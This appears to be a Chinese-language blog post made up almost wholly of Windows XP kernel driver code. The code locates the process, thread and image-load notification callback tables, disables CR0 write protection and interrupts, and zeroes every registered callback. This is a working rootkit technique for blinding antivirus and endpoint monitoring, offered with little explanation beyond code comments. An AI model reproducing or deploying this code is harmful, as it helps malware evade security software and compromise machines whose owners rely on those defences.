2. 技术人生
    3. PspCreateProcessNotifyRoutine,PspCreateThreadNotifyRoutine,PspLoadImageNotifyRoutine表全部清空

    PspCreateProcessNotifyRoutine,PspCreateThreadNotifyRoutine,PspLoadImageNotifyRoutine表全部清空

    技术2022-05-11  34

    RtlInitUnicodeString(&name,L"PsSetCreateProcessNotifyRoutine"); RemoveNotifyRoutine((PVOID)MmGetSystemRoutineAddress(&name));

    RtlInitUnicodeString(&name,L"PsRemoveCreateThreadNotifyRoutine"); RemoveNotifyRoutine((PVOID)MmGetSystemRoutineAddress(&name));

    RtlInitUnicodeString(&name,L"PsRemoveLoadImageNotifyRoutine"); RemoveNotifyRoutine((PVOID)MmGetSystemRoutineAddress(&name));

    __declspec(naked) void DisableWPBitAndCli() { __asm {    cli    mov     eax, cr0    and     eax, 0xFFFEFFFF    mov     cr0, eax    retn } }

    __declspec(naked) void EnableWPBitAndSti() { __asm {     mov eax, cr0     or eax, 0x10000     mov cr0, eax     sti     retn } } NTSTATUS MydrvDispatch (       IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp       ) { Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0L; IoCompleteRequest( Irp, 0 ); return Irp->IoStatus.Status; }

    /* NTSTATUS RemoveNotifyRoutine(PVOID RemoveFunPointer)

    can remove all of the Routine of CreateThread and CreateProcess and LoadImage 注意传入参数为下面三者之一 PsSetCreateProcessNotifyRoutine PsRemoveCreateThreadNotifyRoutine PsRemoveLoadImageNotifyRoutine =========== by xp sp2 */ NTSTATUS RemoveNotifyRoutine(PVOID RemoveFunPointer) { ULONG AddrFun; ULONG* pRoutineList; ULONG i;

    pRoutineList = 0; AddrFun = (ULONG)RemoveFunPointer; DbgPrint("RemoveNotifyRoutine = X/n",RemoveFunPointer); // //the RemoveFunPointer could //only be PsRemoveLoadImageNotifyRoutine //or PsSetCreateProcessNotifyRoutine //or PsRemoveCreateThreadNotifyRoutine //find code bf 00975680      mov     edi,offset nt!PsThreadType+0x44 (80569700) // for(i = AddrFun;i<AddrFun + 0x20;i++) {    if( 0xbf == *(PBYTE)i )    {     i++;     pRoutineList = (ULONG*)( *(ULONG*)i );     break;

       } }

    if( 0 == pRoutineList) {    DbgPrint("Can not find the RoutineList/n");    return STATUS_UNSUCCESSFUL; } if( TRUE != MmIsAddressValid((PVOID)pRoutineList) )// memory is valid {    DbgPrint("Access Memory is not Valid X/n",pRoutineList);    return STATUS_UNSUCCESSFUL; } // //Zero the PspCreateThreadNotifyRoutine; // DisableWPBitAndCli(); for(i=0;i<8;i++) //这里写成0x40也没有问题,我看他这个表应该长度为0x40,但网上说PspCreateProcessNotifyRoutine表长

    度在win2K下为8,xp下为多少,我没有找到资料,懒得去分析代码找出他的长度 {    //if( 0 == pRoutineList[i] )break;    pRoutineList[i] = 0;//清空 } EnableWPBitAndSti();

    DbgPrint("RemoveNotifyRoutine STATUS_SUCCESS X/n",RemoveFunPointer); return STATUS_SUCCESS;

    专利

    最新回复(0)